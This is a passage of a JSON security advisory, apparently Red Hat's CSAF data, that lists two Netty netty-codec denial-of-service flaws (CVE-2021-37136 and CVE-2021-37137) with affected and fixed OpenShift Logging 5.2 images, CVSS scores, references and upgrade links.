"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2004133"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty\u0027s netty-codec due to size restrictions for decompressed data in the Bzip2Decoder. By sending a specially-crafted input, a remote attacker could cause a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In the OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack ship the vulnerable version of netty-codec package. Since the release of OCP 4.6, the Metering product has been deprecated [1], so the affected components are marked as wontfix. This may be fixed in the future.\n\nStarting in OCP 4.7, the elasticsearch component is shipping as a part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8). The elasticsearch component delivered in OCP 4.6 is marked as `Out of support scope` because these versions are already under Maintenance Phase of the support.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x"
],
"known_not_affected": [
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-37136"
},
{
"category": "external",
"summary": "RHBZ#2004133",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004133"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-37136",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37136"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv",
"url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv"
}
],
"release_date": "2021-09-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T18:38:45+00:00",
"details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.2, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5127"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data"
},
{
"cve": "CVE-2021-37137",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-09-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2004135"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Netty\u0027s netty-codec due to unrestricted chunk lengths in the SnappyFrameDecoder. By sending a specially-crafted input, a remote attacker could cause excessive memory usage resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of netty-codec package.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\nStarting in OCP 4.7, the elasticsearch component is shipping as a part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8). The elasticsearch component delivered in OCP 4.6 is marked as `Out of support scope` because these versions are already under Maintenance Phase of the support.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x"
],
"known_not_affected": [
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x",
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-37137"
},
{
"category": "external",
"summary": "RHBZ#2004135",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004135"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-37137",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37137"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv",
"url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv"
}
],
